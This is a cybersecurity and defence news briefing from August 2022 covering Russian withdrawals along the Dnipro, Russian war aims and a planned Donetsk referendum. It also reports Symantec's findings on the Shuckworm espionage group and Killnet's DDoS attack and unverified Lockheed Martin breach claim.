Ukraine at D+172: Regrouping along the Dnipro.
N2K logoAug 15, 2022

As Russian command elements withdraw east across the Dnipro River, Russian war aims become increasingly clear. Cyber threat actors Shuckworm and Killnet continue to hack (recently with indifferent success) in the Russian interest.

Ukraine at D+172: Regrouping along the Dnipro.

Russian command elements are reported to have withdrawn east of the Dnipro River. According to the Telegraph, the displacing command posts have left approximately 20,000 Russian troops west of the river, where their ability to withdraw and Russia's ability to supply them are increasingly in doubt.

Saturday's situation report from the UK's Ministry of Defence (MoD) focused on bridges, and the challenge of supplying Russian forces occupying positions along the Black Sea. "The two primary road bridges giving access to the pocket of Russian occupied territory on the west bank of the Dnipro in Kherson Oblast are now probably out of use for the purposes of substantial military resupply. On 10 August 2022, Ukrainian precision strikes likely rendered the road crossing of the Dnipro River at Nova Kakhovka unusable for heavy military vehicles. In recent days, Russia has only succeeded in making superficial repairs to the damaged Antonivsky road bridge which likely remains structurally undermined. Last week, the main rail bridge near Kherson was also further damaged. Since late July 2022, Russia has been using a pontoon ferry near the railway bridge as its main military resupply route. Even if Russia manages to make significant repairs to the bridges, they will remain a key vulnerability. Ground resupply for the several thousand Russian troops on the west bank is almost certainly reliant on just two pontoon ferry crossing points. With their supply chain constrained, the size of any stockpiles Russia has managed to establish on the west bank is likely to be a key factor in the force’s endurance."

On Sunday the MoD updated its reports on Russia's shift of regular formations to reinforce southern Ukraine. Militia and conscript units from the Donbas seem to be supplying much of the none-too-plentiful manpower committed to holding ground in Donetsk and Luhansk. "Over the past week, Russia’s priority has likely been to re-orientate units to reinforce southern Ukraine. However, in the Donbas, Russian-backed forces – largely militia of the self-proclaimed Donetsk People’s Republic – have continued to attempt assaults to the north of Donetsk city. Particularly heavy fighting has focused on the village of Pisky, near the site of Donetsk Airport. The settlement probably remains contested. The area has been on the front line of the Donbas Line of Control since 2014.The Russian assault likely aims to secure the M04 highway, the main approach to Donetsk from the west."

Russian war aims.

Granted, Rossiya 1 isn't the Duma, still less the office of President, but there's not a great deal of daylight between those three institutions. Russia Media Monitor shares an unusually forthright discussion in one of that channel's political talk shows of the Ukrainian natural resources (energy, mineral, and arable) and attendant economic potential now under Russian control. While there are a few verbal gestures in the direction of separatist, independent republics benefiting from their prosperous development under Russian protection, the overall content and tone is that the Russian war aim is conquest, and conquest for economic advantage. "It makes me proud," as the moderator says.

Rossiya 1 isn't alone in giving frank expression to expansive Russian war aims. An essay in Foreign Policy by Meduza's Alexey Kovalev lays out the open and overt characterization of Russia's goals and conduct in Russian media generally. "Everything in Yale University historian Timothy Snyder’s “genocide handbook” has already been perpetrated in one form or another, including forced Russification and the abduction of thousands of Ukrainian children to be raised as Russians in the motherland. Kremlin-loyalist media are not only cheering all of this on but demanding even more cruelty: A Komsomolskaya Pravda radio host demanded a gulag to be built for Ukrainian teachers who have been refusing to follow the Russia-supplied syllabus. In case anyone has forgotten, gulags were hard labor camps where an estimated 1.6 million political and other prisoners perished during Soviet dictator Joseph Stalin’s brutal rule."

Kovalev also excoriates Western politicians and academics who he sees as appeasing and enabling Mr. Putin's war, whether on broadly realist grounds or from a position shaped by reflexive progressive anti-war and anti-NATO sentiment. A recent example of the convergence of both points of view appeared this morning in Antiwar, which sees NATO in general and Canada in particular as prosecuting a proxy war against Russia. "Restarting UNIFIER [the Canadian military training mission to Ukrainian forces], which was paused just before Russia’s illegal February 24 invasion, raises a number of moral questions about strengthening the far right, turning civilians into cannon fodder and, most significantly, whether UNIFIER will extend and expand the war. The Canadian government claims its objective is to defend Ukrainian sovereignty, which has a ring of truth to it. But UNIFIER was at the center of Canada’s proxy war with Russia." The article cites the realist political scientist John Mearsheimer ("In a widely viewed, though much maligned, 2015 lecture titled 'Why is Ukraine the West’s Fault?' prominent US realist scholar John Mearsheimer pointed out that pressing Ukraine to get tough with Russia by dangling EU and NATO membership was leading Ukraine 'down the primrose path' that will see the country 'get wrecked.'") The Antiwar piece concludes, "Ottawa restarting Operation UNIFIER adds weight to those who have been saying that NATO’s aim all along has been to fight Russia to the last Ukrainian."

A referendum on annexation by Russia is expected to be held in Donetsk shortly after the province comes under full Russian control, today's MoD situation report says. "On 11 August 2022, Russian media reported that Denis Pushilin, head of the so-called Donetsk People’s Republic (DPR), had said that the date of a referendum on the DPR joining Russia will be announced after the DPR’s ‘complete liberation’. Previously, in June 2022, investigative journalists published evidence of a DPR planning strategy for running such a referendum and for ensuring that at least 70 per cent of votes were in favour of joining Russia. It is likely that Russia is in the advanced planning stages to hold a referendum, though it is unclear if the final decision to go ahead with a vote has yet been taken. The Kremlin will likely see the military’s failure to occupy the entirety of Donetsk Oblast thus far as a setback for its maximalist objectives in Ukraine."

Foreign Affairs offers an interesting summary of Russian strategic and operational mistakes, how Russia seems ready to commit them again in the next phase of the war, and how Russia, by forcible annexations backed by bogus plebiscites, may seek to recast Ukraine as the aggressor.

Shuckworm maintains its focus on Ukrainian targets.

The Symantec Threat Hunter Team, part of Broadcom Software, this morning released a report on the activities of Shuckworm, a Russian state threat actor. The payload in its most recent operation, which Symantec has been tracking since the 15th of July, is an information-stealer. The researchers describe the infection vector: "The first suspicious activity Symantec saw on victim systems was a self-extracting 7-Zip file, which was downloaded via the system’s default browser. Subsequently, mshta.exe downloaded an XML file, which was likely masquerading as an HTML application (HTA) file. These files were downloaded from the following domain: a0698649[.]xsph[.]ru. It has been publicly documented since May 2022 that subdomains of xsph[.]ru are associated with Shuckworm activity, and this domain was once again mentioned in CERT-UA’s July 26 publication about Shuckworm activity." The malicious domain has been seen before, appearing as it did in an email that pretended to be from the Security Service of Ukraine (SSU), and whose phishbait was, according CERT-UA, a subject line containing “Intelligence Bulletin.” Today's report observes, "This being the case, it is most likely the 7-Zip file seen on victim networks in the campaign observed by Symantec was delivered to victims via email."

Also known as Gamaredon, Armageddon, Actinium, or Primitive Bear, BeepingComputer last November reported that Ukraine's SSU had connected the group Symantec calls "Shuckworm" with a unit of Russia's FSB operating from Crimea. The Symantec Threat Hunter Team's overall picture of Shuckworm sees it as making up in persistence what it lacks in tactical sophistication. "As the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to be continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure does not deter the group from its activities. While Shuckworm is not necessarily the most tactically sophisticated espionage group, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations." The report includes a list of indicators of compromise.

Killnet's DDoS and dubious proof-of-work.

Tagesspiegel reports that websites belonging to Latvia's parliament came under distributed denial-of-service attack last Thursday. Killnet claimed responsibility, and the nuisance-level attack is certainly directly in the nominally hacktivist Russian front group's wheelhouse. The attack, which largely fizzled, was a comment on Latvia's vote to designate Russia a terrorist state for its aggression and war crimes in Ukraine.

Killnet's own designation of Lockheed Martin as a "terrorist" organization has been followed by the group's claims that the American manufacturer of HIMARS rocket artillery systems has been successfully subjected to a ransomware attack that exfiltrated data on company personnel. Killnet has published a video they say proves they've got the data, but SecurityWeek Friday reported continuing assessments (most recently by Searchlight Security) that this is an empty claim. “Cross-referencing a sample of the data it does appear that they are or were genuine Lockheed employees, however that does not necessarily confirm that the company was breached,” the outlet quotes a Searchlight analyst as saying. “For example, this could be a re-hash of old or open source data in an attempt to undermine the organization and intimidate its employees.”